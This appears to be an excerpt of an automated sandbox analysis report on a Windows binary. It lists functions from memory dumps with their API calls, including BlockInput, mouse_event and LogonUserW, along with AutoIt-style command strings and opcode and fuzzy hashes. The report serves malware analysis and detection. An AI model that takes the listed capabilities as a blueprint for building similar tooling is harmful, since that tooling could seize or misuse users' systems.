                                                    • Opcode ID: 77962d20c8b6ced94930208afe6334443e639ec9fdd71e3062054dc17f8ef0f3
                                                    • Instruction ID: 1aeab84b04b5fd839ea3c868517153fc16cdcb227ff799a0a3a830f765568ef9
                                                    • Opcode Fuzzy Hash: 77962d20c8b6ced94930208afe6334443e639ec9fdd71e3062054dc17f8ef0f3
                                                    • Instruction Fuzzy Hash: 66B09235054208ABCA002F91EC09F883F68EB46AA2F404030FA0D84C60CB6254548A99
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003D3190, Relevance: 1.8, Strings: 1, Instructions: 587COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Oa=
                                                    • API String ID: 0-2684945688
                                                    • Opcode ID: b4cb64943529b73246322472cb611c72636f4291f064f0104d63ca63433e5bfe
                                                    • Instruction ID: d9342541c771588430226760116d76e1ab82f6c75bfab693f80100cbfdb34297
                                                    • Opcode Fuzzy Hash: b4cb64943529b73246322472cb611c72636f4291f064f0104d63ca63433e5bfe
                                                    • Instruction Fuzzy Hash: 472268725083019FD726DF24D881B6AB7E5AF85304F01492EF89A9B391DB74EE44CB93
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003ECD61, Relevance: 1.8, APIs: 1, Instructions: 270COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,0000FFFF,?,?,003ECAA7,?,?,?,?,?,?,00000000), ref: 003ECF8C
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: ExceptionRaise
                                                    • String ID:
                                                    • API String ID: 3997070919-0
                                                    • Opcode ID: 132acc8479a1063e09d408fbb31d041e9ca64cf7d98d2dc3a202905e225e2f35
                                                    • Instruction ID: 701c1e664505858d2dce8e418fe9feadeda16841b1d45efb599dc408209f5363
                                                    • Opcode Fuzzy Hash: 132acc8479a1063e09d408fbb31d041e9ca64cf7d98d2dc3a202905e225e2f35
                                                    • Instruction Fuzzy Hash: D0B13B31220658DFD716CF29C486B697BE1FF45365F2A8658E899CF2E1C335E982CB40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004341FD, Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • BlockInput.USER32(00000001), ref: 00434218
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: BlockInput
                                                    • String ID:
                                                    • API String ID: 3456056419-0
                                                    • Opcode ID: 0a2f4df9e0c4c82e14cbe07ecb322c65b8d502b6d26a6692995ed90e72dab3df
                                                    • Instruction ID: 291fb830071cb073cab2540e0064a044fa0e2843665099bdccd0abeea42dd89d
                                                    • Opcode Fuzzy Hash: 0a2f4df9e0c4c82e14cbe07ecb322c65b8d502b6d26a6692995ed90e72dab3df
                                                    • Instruction Fuzzy Hash: 19E012352401149FC7109F59D444F9BB7D8AF987A0F01806AFC49DB351DA74BC418B95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00424EC9, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: mouse_event
                                                    • String ID:
                                                    • API String ID: 2434400541-0
                                                    • Opcode ID: 9871f6d2591a1294a9a9edfeb6fe0b15f3fd77dd74a5592ab2332973f226696a
                                                    • Instruction ID: bbbd9e01fbd8a84c3d253a0c55c6f66d34f05c7b28f9c529f6b864a4a71e84a0
                                                    • Opcode Fuzzy Hash: 9871f6d2591a1294a9a9edfeb6fe0b15f3fd77dd74a5592ab2332973f226696a
                                                    • Instruction Fuzzy Hash: CED05EA836062479FC181B24BC5FF770108F384795FD2028BB101C91C2D8D86D559439
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00418C93, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LogonUserW.ADVAPI32(?,?,?,00000001,00000000,?), ref: 00418CB3
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: LogonUser
                                                    • String ID:
                                                    • API String ID: 1244722697-0
                                                    • Opcode ID: f457a3adbd5c890a8f394e60b679407b65feab58f857b693492377955c6717df
                                                    • Instruction ID: 53f14dcc251a7eb8441ed263c75b83ad5bdfd40c0ad7593a97bf0553ab5b52e0
                                                    • Opcode Fuzzy Hash: f457a3adbd5c890a8f394e60b679407b65feab58f857b693492377955c6717df
                                                    • Instruction Fuzzy Hash: F9D0173229040EABEF018EA4EC01EBF3B69EB01701F408111FA15C50A0C676D425AB20
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00402230, Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetUserNameW.ADVAPI32(?,?), ref: 00402242
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: NameUser
                                                    • String ID:
                                                    • API String ID: 2645101109-0
                                                    • Opcode ID: 0b04e0751ddabe29c9b8e36264e72f089b0c7f96b36b51a3ea01a2405aeec12b
                                                    • Instruction ID: 22d19b965a8867e2fb886a0a4b0df2e9f535af2a5ab63cdd885e47f7cee3739e
                                                    • Opcode Fuzzy Hash: 0b04e0751ddabe29c9b8e36264e72f089b0c7f96b36b51a3ea01a2405aeec12b
                                                    • Instruction Fuzzy Hash: BFC048F5800109DBDB15DBA0DA88DEEB7BCAB08304F2040A6A102F2150E778AB488A76
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003EA364, Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNEL32(?,?,003F4D67,003F4D1C), ref: 003EA36A
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    • Opcode ID: 40f8d425779a5a44787eac42890653299cab4eda7823090ddede02b5abe9de7d
                                                    • Instruction ID: f0b7f1268b8a818c2391a79385a09b3057566f1c089750e86349bcfaba308d64
                                                    • Opcode Fuzzy Hash: 40f8d425779a5a44787eac42890653299cab4eda7823090ddede02b5abe9de7d
                                                    • Instruction Fuzzy Hash: F4A0017619100DABCA011F92FC09CAA7F6DEA476EA7028062F80D84C21873355659AA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00428B13, Relevance: 1.3, Strings: 1, Instructions: 70COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Time$FileSystem
                                                    • String ID: 0uH
                                                    • API String ID: 2086374402-4049959059
                                                    • Opcode ID: 184cc61d94f2d720fa9aaf2733c00b7fc27e6d64b487221e9e060fcf3938b84e
                                                    • Instruction ID: 9729977bec8b0847610b384face344d60bfa443bd1ac6df2bfabbcbb64fc49f7
                                                    • Opcode Fuzzy Hash: 184cc61d94f2d720fa9aaf2733c00b7fc27e6d64b487221e9e060fcf3938b84e
                                                    • Instruction Fuzzy Hash: 2A2127722355108FD329CF25E841A56B7E1EBA5310B688E6DE0F5CB2D0CA74B904CB98
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003EBFE6, Relevance: .8, Instructions: 756COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1db12a78eaa90df9dabcb934ebf00f0af71165c9fe3916c600cf0042de3f0a57
                                                    • Instruction ID: ebe308ada8678b4444b4b5aae4922d9f1beb94b7b148bd6201243bc4b0d10f4a
                                                    • Opcode Fuzzy Hash: 1db12a78eaa90df9dabcb934ebf00f0af71165c9fe3916c600cf0042de3f0a57
                                                    • Instruction Fuzzy Hash: DB42A175D202A9CEDF26CFAAC8906EDBBB5FB09310F61522AD456EB6C1D3345C42CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003F89DF, Relevance: .7, Instructions: 715COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 84d12314d2001b0905f896b30837241e3b3bc33b70f191d2fe93f6d93c5618be
                                                    • Instruction ID: b164ae6e9106eb12090d4aed2a61391122d3f8c5f845cff4dfc399581ce43e2e
                                                    • Opcode Fuzzy Hash: 84d12314d2001b0905f896b30837241e3b3bc33b70f191d2fe93f6d93c5618be
                                                    • Instruction Fuzzy Hash: 27326672E0564D8FDB2ACFA8C8557FDBBB5FB18310F25412AE655AB291DB348C81CB10
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003EF419, Relevance: .7, Instructions: 696COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 37f5e875c337ebdb890c108490961ec01765d814bacc2b0461a74b169f75c55c
                                                    • Instruction ID: 6e46dc9d75707016be1eb4b225f6220fcc6b800a38afa8376d1d18e6590f08f5
                                                    • Opcode Fuzzy Hash: 37f5e875c337ebdb890c108490961ec01765d814bacc2b0461a74b169f75c55c
                                                    • Instruction Fuzzy Hash: BB322022D69F510CD7239635E822339A24CAFB73D9F25D737F81AB49A6EB68D4834104
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003F6A94, Relevance: .6, Instructions: 592COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 86a59d1c031c3e2f395bf26bcce37b460558bc028bcb7879d7bdd19e4a359327
                                                    • Instruction ID: 3cd8c0bf1bbb2c255b9e48ce481af791d436aac6daeb527265518ccdda1a2aa5
                                                    • Opcode Fuzzy Hash: 86a59d1c031c3e2f395bf26bcce37b460558bc028bcb7879d7bdd19e4a359327
                                                    • Instruction Fuzzy Hash: 2A12A372A1121D9FDF05CFA8E8815FDBBB5FB88320F24463EE622E7294D77069058B50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003E16C4, Relevance: .5, Instructions: 485COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 88db6ce7403db9720d0f5c46a65486ba02c312a0e6710be9e1f122377d171081
                                                    • Instruction ID: d357dfddadc88eac5889b414dff078314c81ca795401a8b8150805f51011ec93
                                                    • Opcode Fuzzy Hash: 88db6ce7403db9720d0f5c46a65486ba02c312a0e6710be9e1f122377d171081
                                                    • Instruction Fuzzy Hash: 7602A3322051F20ADB2E4A3B887007BBBE569523B131F476DE4B7CB4C5EE30D965D6A0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003E2405, Relevance: .3, Instructions: 346COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2d13b3f12c610b86e141b96ccc6b55593b12a47b6bef3a2a595853d89bc9d5f9
                                                    • Instruction ID: 0f039db379f9175d288be92979028484f9f9ee85ce5176f2855848a5202d5160
                                                    • Opcode Fuzzy Hash: 2d13b3f12c610b86e141b96ccc6b55593b12a47b6bef3a2a595853d89bc9d5f9
                                                    • Instruction Fuzzy Hash: BFC150322050F209EF2E463B993403EFBE56AA27B131B075EE4B3DB4D5EE309565D620
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003E283A, Relevance: .3, Instructions: 342COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 92d4c24914fa398024ca0c4b990b34815a9b6155ae83376abfb071da7c62f562
                                                    • Instruction ID: 01361959b61cde8e355a47e8d497019acf25705c46a15ddd66148849236dab8f
                                                    • Opcode Fuzzy Hash: 92d4c24914fa398024ca0c4b990b34815a9b6155ae83376abfb071da7c62f562
                                                    • Instruction Fuzzy Hash: F6C170332050F30AEF6E463B983403EFBE55A927B131B176DE4B2DB4C5EE309565A620
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003E1BB8, Relevance: .3, Instructions: 324COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bae1d401a77f9eb3f3688dd1a964ac2298bba0ff2dab579a5315b1f0768bfc55
                                                    • Instruction ID: 995782352cce45f656cc89567b6a47f8b8269afcd05d32923044e07aff2f11be
                                                    • Opcode Fuzzy Hash: bae1d401a77f9eb3f3688dd1a964ac2298bba0ff2dab579a5315b1f0768bfc55
                                                    • Instruction Fuzzy Hash: 09B16F322090F309DF6E463B983403EBBE56A927B131B076EE4B3CB5C4EE3095659660
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003F267E, Relevance: .3, Instructions: 297COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ea7184f45fea33a49adb058a43a4e8a425897f187f7f991afb1a49cf75f430b5
                                                    • Instruction ID: 326fe8e8d0d9d77ffa1c6c8b226064f81869c8da07cf43d2e9f095dae0eaf67c
                                                    • Opcode Fuzzy Hash: ea7184f45fea33a49adb058a43a4e8a425897f187f7f991afb1a49cf75f430b5
                                                    • Instruction Fuzzy Hash: 27B10120D2AF414DD72396398831336BB4CAFBB6DAF52D72BFC2674D22EB2185934145
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003F7006, Relevance: .2, Instructions: 212COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 60eff261274cf77f728fae4922d7137d46833222afe95c08d5303e1c6c5a3e27
                                                    • Instruction ID: a46e9cdca4458d374b19bfa324c4d382dd68f69ff8ffe8f365ee2b00b7cbda9d
                                                    • Opcode Fuzzy Hash: 60eff261274cf77f728fae4922d7137d46833222afe95c08d5303e1c6c5a3e27
                                                    • Instruction Fuzzy Hash: C0618072D0522A9FDF19CF59C8805BAFBF5EFC5310729C16AEA09DB205DA309945CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004437F3, Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?,0044F910,?), ref: 004438AF
                                                    • IsWindowVisible.USER32 ref: 004438D3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: BuffCharUpperVisibleWindow
                                                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                    • API String ID: 4105515805-45149045
                                                    • Opcode ID: be363ed93c9931067f95b0e3721b391051e9abb2387a092a9f30c72530f9033e
                                                    • Instruction ID: 0b3d9ef58abe6fd6beddedfea852831d3db7cbb1424c999f4cdb1fb5a59fa4a4
                                                    • Opcode Fuzzy Hash: be363ed93c9931067f95b0e3721b391051e9abb2387a092a9f30c72530f9033e
                                                    • Instruction Fuzzy Hash: 00D1A130204205DBDB14EF11C855BAAB7A5EF54755F01845EB8865F3E3CB38EE4ACB8A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0044A849, Relevance: 49.8, APIs: 33, Instructions: 282COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetTextColor.GDI32(?,00000000), ref: 0044A89F
                                                    • GetSysColorBrush.USER32(0000000F), ref: 0044A8D0
                                                    • GetSysColor.USER32(0000000F), ref: 0044A8DC
                                                    • SetBkColor.GDI32(?,000000FF), ref: 0044A8F6
                                                    • SelectObject.GDI32(?,?), ref: 0044A905
                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 0044A930
                                                    • GetSysColor.USER32(00000010), ref: 0044A938
                                                    • CreateSolidBrush.GDI32(00000000), ref: 0044A93F
                                                    • FrameRect.USER32 ref: 0044A94E
                                                    • DeleteObject.GDI32(00000000), ref: 0044A955
                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 0044A9A0
                                                    • FillRect.USER32 ref: 0044A9D2
                                                      • Part of subcall function 0044AB60: GetSysColor.USER32(00000012), ref: 0044AB99
                                                      • Part of subcall function 0044AB60: SetTextColor.GDI32(?,0044A869), ref: 0044AB9D
                                                      • Part of subcall function 0044AB60: GetSysColorBrush.USER32(0000000F), ref: 0044ABB3
                                                      • Part of subcall function 0044AB60: GetSysColor.USER32(0000000F), ref: 0044ABBE
                                                      • Part of subcall function 0044AB60: GetSysColor.USER32(00000011), ref: 0044ABDB
                                                      • Part of subcall function 0044AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0044ABE9
                                                      • Part of subcall function 0044AB60: SelectObject.GDI32(?,00000000), ref: 0044ABFA
                                                      • Part of subcall function 0044AB60: SetBkColor.GDI32(?,?), ref: 0044AC03
                                                      • Part of subcall function 0044AB60: SelectObject.GDI32(?,?), ref: 0044AC10
                                                      • Part of subcall function 0044AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 0044AC2F
                                                      • Part of subcall function 0044AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0044AC46
                                                      • Part of subcall function 0044AB60: GetWindowLongW.USER32(?,000000F0), ref: 0044AC5B
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongRoundSolidWindow
                                                    • String ID:
                                                    • API String ID: 3205543919-0
                                                    • Opcode ID: 650cdca49451b9588e1f598a95ac9f23938fca59fb5c5a93d7f92b973b3914a1
